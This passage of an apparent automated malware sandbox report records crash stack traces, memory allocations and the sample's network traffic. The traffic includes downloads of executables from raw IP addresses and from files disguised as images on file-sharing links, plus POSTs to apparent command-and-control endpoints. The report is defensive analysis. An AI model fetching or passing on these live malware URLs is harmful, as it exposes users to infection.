clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 af exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95da83 registers.esp: 3272032 registers.edi: 42185672 registers.eax: 47202572 registers.ebp: 3272084 registers.edx: 0 registers.ebx: 45982516 registers.esi: 47202572 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95d839 0x95a7d9 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 af exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95da83 registers.esp: 3272032 registers.edi: 42185672 registers.eax: 48685732 registers.ebp: 3272084 registers.edx: 0 registers.ebx: 47332216 registers.esi: 48685732 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95db09 0x95a89f 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 51 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95dce1 registers.esp: 3272032 registers.edi: 42185672 registers.eax: 0 registers.ebp: 3272084 registers.edx: 0 registers.ebx: 43214312 registers.esi: 43818308 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95db09 0x95a89f 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 51 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95dce1 registers.esp: 3272032 registers.edi: 42185672 registers.eax: 0 registers.ebp: 3272084 registers.edx: 0 registers.ebx: 44087196 registers.esi: 45307244 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x95db09 0x95a89f 0x959cbc 0x957f40 0x9534a0 0x953126 0x951b93 0x951b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 51 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x95dce1 registers.esp: 3272032 registers.edi: 42185672 registers.eax: 0 registers.ebp: 3272084 registers.edx: 0 registers.ebx: 45576132 registers.esi: 46796180 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (13 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://193.42.32.118/api/tracemap.php
suspicious_features	Connection to IP address	suspicious_request	GET http://94.142.138.131/api/tracemap.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://94.142.138.131/api/firegate.php
suspicious_features	Connection to IP address	suspicious_request	GET http://45.15.156.229/api/tracemap.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://45.15.156.229/api/firegate.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://45.9.74.80/ummaa.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://45.9.74.80/super.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://45.9.74.80/ummaa.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://45.9.74.80/super.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://45.9.74.80/0bjdn2Z/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.9.74.80/chrome.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.9.74.80/toolspub2.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.9.74.80/31839b57a4f11171d6abc8bbc4451ee4.exe

Performs some HTTP requests (39 events)

request	GET http://193.42.32.118/api/tracemap.php
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://94.142.138.131/api/tracemap.php
request	POST http://94.142.138.131/api/firegate.php
request	HEAD http://red.mk/netTime.exe
request	GET http://red.mk/netTime.exe
request	GET http://45.15.156.229/api/tracemap.php
request	GET http://www.maxmind.com/geoip/v2.1/city/me
request	POST http://45.15.156.229/api/firegate.php
request	HEAD http://45.9.74.80/ummaa.exe
request	HEAD http://45.9.74.80/super.exe
request	GET http://45.9.74.80/ummaa.exe
request	GET http://45.9.74.80/super.exe
request	HEAD http://230809204625331.nes.dtf99.top/f/fikim0809331.exe
request	GET http://230809204625331.nes.dtf99.top/f/fikim0809331.exe
request	POST http://45.9.74.80/0bjdn2Z/index.php
request	GET http://45.9.74.80/chrome.exe
request	GET http://45.9.74.80/toolspub2.exe
request	GET http://45.9.74.80/31839b57a4f11171d6abc8bbc4451ee4.exe
request	GET https://api.myip.com/
request	GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
request	GET https://sergejbukotko.com/7725eaa6592c80f8124e769b4e8a07f7.exe
request	GET https://preconcert.pw/setup294.exe
request	GET https://vk.com/doc44017378_668679037?hash=6lxdrm9NUkSryZCfzYZn4zR2sOTXzaKgfQIcVCaPnvX&dl=FLqYTpktPSSWsXhtSyyzRawRyuZZexn7WIKXiXEZBv4&api=1&no_preview=1
request	GET https://sun6-20.userapi.com/c909618/u44017378/docs/d36/4045d7e5e2af/PL_Client.bmp?extra=41RYXiYdonWnWPYwQIzl_E40YzLt9e-a585sYDB48TJ1guOgXM82khcH113VcyDUy1qRwuEub4FUsSEnl5OfhF82khtCO4eGvfgR1-OEX6MePbBwAaiux-eLDXjut3NIRQnlEpVeZ_pbxMeI
request	GET https://vk.com/doc44017378_668841700?hash=B7naXG9fPpueUKaZxzbzFzqgThiLopd9A232GVSoLbD&dl=VDCn0RuU4RRcIuzpA6hHZu4JCvVt7UCUAmWFRORbSKs&api=1&no_preview=1
request	GET https://vk.com/doc44017378_668850966?hash=seNAc9XpZGb24lXnAxVAwPiPVaSTe6IiTQaY7IFhggw&dl=A9mazd4TmUx700iSSJAZzZTPnbX30hG5PEtIhQs2FVw&api=1&no_preview=1#utube
request	GET https://sun6-23.userapi.com/c909618/u44017378/docs/d58/7bf5e3bbbea6/Synapse.bmp?extra=mzMMk3WSUR9nXjlWZ6cDWS8uZXnpeH5HFoj4k-neSMlSwedoZanNxQoG3h1Fl180ZYqPy_dIeBEOfQRiGTKUc2qv1mDlwQ6hq_BjfKmI04Adw-GHSVg0utmIeVwn4vFkEZ55FEGR_EeCU6su
request	GET https://vk.com/doc44017378_668685574?hash=2Z9kWDMxHv9Bg52ieOFMjjyZlIe2LzZhpXJtbJfi2jD&dl=MckLSTrLnFqxzbDQcQsY8zw8KxvNLWnEyU8AMbhyK6s&api=1&no_preview=1#WW1
request	GET https://vk.com/doc44017378_668897025?hash=9izn0TzhC6Gq52AYs6wKluNJs8IMGa5IygoIE2NWiZX&dl=RzpPQgkrU5Bo3xTNnupfnzibo1sU36B0QqzJYdEUq3c&api=1&no_preview=1#redcl
request	GET https://psv4.userapi.com/c909328/u44017378/docs/d1/0a7c8509d5a4/setup.bmp?extra=P2d8Fo57PDhjSbNAarsgzs7s47HfESup6nA9QPs2Jx9jlMkoKc6DXgshHhytmelgvUOzcd0WK42AeucPRw8quv3aFraVcKsYb_UHW5Cd0JUYBJDa80M3IYxPpdUAHDMFCB4T3ofEtFx6cwIp
request	GET https://sun6-21.userapi.com/c909628/u44017378/docs/d11/1a3013098cbf/WWW1.bmp?extra=xgcuwlyssMW5fhehD936AqhRSGL9n6WAhvJJzjwcFZ3WMiE8xWxO3qKhr9_8jnDUTj1l3e5eKgd9DPl2hGHNRQsMstXoksgW-4kZoEzSOKif1Txq8vuSgC4s2KKLAdrZ_tDy6XI04Nl-lgHm
request	GET https://vk.com/doc44017378_668913178?hash=82bcV2gCZ1FH8Z8HToaxuiwCiEN2mz2z1qfoXJTCPC0&dl=ErxeeY7X3LIyZIBiZ0QDMkzCLk2vvDO29uX36h22aek&api=1&no_preview=1#u9
request	GET https://psv4.userapi.com/c235131/u44017378/docs/d5/fdcd3504e8e2/red.bmp?extra=jTIQRXaPDO1NXMmXQzzFrL0w8M0Aux3xQ53jP9K5Av5remAWM4J7b2bi3isiBFlCsp9FQNBSHuz3j5e9qdLEiiiGgHwS2dsPjt2cu0sirG6iWFSzreqm7rUEnldpiXUhrfN3QUEmNd-PGjtX
request	GET https://psv4.userapi.com/c909328/u44017378/docs/d20/504a645fbcf0/3c8fttmg7n06dp.bmp?extra=nwBZ3AcWEYYSVAyNH3mk248SL5RSBNJDVe69N37eANsig_2_ecdHjz4OT6WcpyvVgAKIctZPELhQbJdVOBqe4OR66kMAtIyuFDxX2XlhP2KRT5d0TVgW8q7aU98EF1IW99b0I6cDT-cHsiy9
request	GET https://db-ip.com/
request	POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
request	GET https://vk.com/doc44017378_668777192?hash=bErtt2Itw8CZPTouyuXblBKb3pLfVImQzvGWnZ4CyVs&dl=vm2AArvcYQaQAETnMlmPKTg0CoqMAAqRh2fogvAYbWP&api=1&no_preview=1#tmwvr
request	GET https://sun6-21.userapi.com/c235131/u44017378/docs/d58/b5d7bd164765/tmvwr.bmp?extra=MOoJ_YAgLF-1um3Me5WawUQVtSpNdXdk4O4HjEHIoEJYoGofA_i-K7joq0CWxFxZ_12PJ_jQLkx1WwKPGJ02adtFNG4_nnXRhcuoM-7EcVqjywc84Edq559VzCTblgn2fgdwqBZ5N-BoxmH6

Sends data using the HTTP POST Method (4 events)

request	POST http://94.142.138.131/api/firegate.php
request	POST http://45.15.156.229/api/firegate.php
request	POST http://45.9.74.80/0bjdn2Z/index.php
request	POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self

Allocates read-write-execute memory (usually to unpack itself) (50 out of 563 events)

Time & API	Arguments	Return
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d82810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d83810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d84810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d85810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d86810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d87810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d88810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d89810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d8f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d90810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d91810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d92810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d93810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d94810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d95810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d96810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d97810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d98810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d99810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d9f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da0810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da1810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da2810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da3810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 6, 2023, 2:03 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076da4810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
